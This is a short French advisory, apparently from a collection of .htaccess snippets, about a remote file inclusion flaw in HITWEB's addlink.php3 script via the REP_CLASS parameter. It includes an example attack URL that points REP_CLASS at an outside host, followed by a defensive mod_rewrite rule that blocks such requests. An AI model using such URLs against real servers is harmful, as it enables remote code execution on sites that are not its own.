HTACCESS

Inclusion de fichiers distants avec un script de HITWEB

Il est possible dans certains cas de faire exécuter du code malveillant avec le script addlink.php3 et un paramètre REP_CLASS.

En effet si le paramètre register_globals est à on, la variable $REP_CLASS est initialisée avec le paramètre GET.

Comme cette variable sert de préfixe au chemin des includes du script addlink.php3 il est facile d'exécuter un script externe sur votre serveur (remote file include).

Les urls sont du type http://www.example.com//addlink.php3?REP_CLASS=http://www.sitepourri.com/page?? Ces deux lignes vous protègent de cette attaque.

RewriteCond %{QUERY_STRING} ^(.*&)?REP_CLASS=http://
RewriteRule ^(.+/)?addlink.php3 - [F,L]
PHP